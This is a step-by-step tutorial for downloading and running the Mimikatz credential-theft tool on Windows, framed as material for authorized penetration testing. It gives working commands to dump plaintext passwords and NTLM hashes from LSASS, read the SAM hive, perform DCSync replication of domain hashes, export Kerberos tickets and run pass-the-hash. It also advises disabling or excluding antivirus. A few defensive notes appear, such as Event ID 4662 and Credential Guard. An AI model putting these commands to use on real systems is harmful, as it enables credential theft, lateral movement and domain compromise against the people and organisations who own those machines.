Introduction

Mimikatz, written by Benjamin Delpy (gentilkiwi), is a post-exploitation tool that extracts plaintext passwords, NTLM hashes, PIN codes and Kerberos tickets from Windows memory, chiefly from the LSASS process. Penetration testers and red teams use it to demonstrate credential exposure on a compromised host; the same capabilities are used by real attackers, which is why every stock build is heavily signatured by antivirus. This guide provides a step-by-step approach to installing and using Mimikatz for authorized security testing.

Warning: Running Mimikatz against systems you are not authorized to test is illegal. Obtain written permission before using it in any environment.

Prerequisites

Before installing Mimikatz, make sure you have the following:

  • A Windows machine (Windows 7 through 11, or the corresponding Server releases); use the x64 build on 64-bit systems
  • Local administrator rights; some commands additionally need SYSTEM, which Mimikatz can impersonate from an elevated token
  • Windows Defender and any other antivirus disabled, or better, configured with an exclusion for the Mimikatz folder only; the binary is flagged as malware, and on a real engagement a scoped exclusion is preferable to switching protection off entirely

Downloading Mimikatz

Mimikatz is open source and hosted on GitHub. The Code > Download ZIP button on the repository page gives you the source tree, which has to be built with Visual Studio. For a ready-to-run binary use the Releases page instead:

  1. Open a web browser and go to https://github.com/gentilkiwi/mimikatz/releases.
  2. Download mimikatz_trunk.zip from the latest release.
  3. Extract the ZIP to a folder of your choice; it contains Win32 and x64 folders, each holding mimikatz.exe and its companion files.

Alternatively, clone the repository with Git if you intend to build from source (the clone contains no compiled binaries):

 git clone https://github.com/gentilkiwi/mimikatz.git

Running Mimikatz

Nearly everything Mimikatz does requires an elevated token, so run it from an elevated shell:

  1. Open Command Prompt or PowerShell as Administrator (right-click, Run as administrator).
  2. Change into the folder matching your architecture, normally x64:
    cd path\to\mimikatz\x64
  3. Start the interactive console:
    mimikatz.exe
  4. You should see the banner followed by the mimikatz # prompt. Commands can also be passed on the command line, each as a separate argument, which is more convenient for scripting and for capturing output.

Basic Mimikatz Commands

1. Enable the Debug Privilege

Reading another process's memory (LSASS) requires SeDebugPrivilege. Administrators hold this privilege, but it stays disabled in the token until a program enables it, which is what privilege::debug does:

privilege::debug

If successful, you should see: Privilege '20' OK (20 is the LUID of SeDebugPrivilege). If it instead reports ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061, the shell is not elevated; close it and reopen it as Administrator.

2. Extracting Passwords from Memory

To dump the credential material LSASS holds for every logon session, use:

sekurlsa::logonpasswords

For each session it prints the username, domain, logon server and SID, then what each security package caches: the NTLM (and SHA1) hash under msv, and a Password field under wdigest, kerberos and tspkg. Plaintext appears only where a package still keeps it. Since Windows 8.1 and Server 2012 R2 (and KB2871997 on older systems) WDigest no longer caches the clear-text password unless HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential is set to 1, so on a patched host expect (null) there and work with the NTLM hash instead. With Credential Guard enabled, the hashes and Kerberos keys are isolated in a separate virtualization-based process and cannot be recovered this way at all.

3. Dumping NTLM Hashes

NTLM hashes can be replayed directly in pass-the-hash attacks, so they are worth collecting even when no plaintext is cached. Local account hashes live in the SAM registry hive, which only SYSTEM can read; from an elevated prompt run privilege::debug, impersonate SYSTEM with token::elevate, then:

lsadump::sam

Domain account hashes are not stored on member machines. To obtain them without touching a domain controller's disk, ask a DC to replicate the account the way another DC would (the DCSync technique, which uses the Directory Replication Service protocol):

lsadump::dcsync /domain:targetdomain.com /user:Administrator

This works from any domain-joined host, but only for an account holding replication rights (Replicating Directory Changes and Replicating Directory Changes All), which Domain Admins and domain controllers have by default. Because the request looks like normal replication traffic, defenders look for Event ID 4662 on the DC showing replication access from an account or source that is not a domain controller.

4. Kerberos Ticket Extraction

Kerberos tickets (TGTs and service tickets) cached in LSASS for every logon session can be listed and saved with the following, after privilege::debug:

sekurlsa::tickets /export

Each ticket is written to a .kirbi file in the current directory, named after the session, user and service. A .kirbi can later be loaded into another session with kerberos::ptt for a pass-the-ticket attack. A TGT is the most valuable one, because it can request service tickets for any service until it expires (10 hours by default).

5. Pass-the-Hash Attack

To authenticate over the network with an NTLM hash instead of a password, run the following after privilege::debug:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Mimikatz starts a new process (cmd.exe unless /run: names another) and replaces the NTLM credential in that process's logon session with the supplied hash. Nothing changes locally, so whoami in the new window still shows your original account; any network authentication from that window, for example listing \\server\c$, is performed as the target user. Supply the 32-hex-character NT hash only, not the LM half.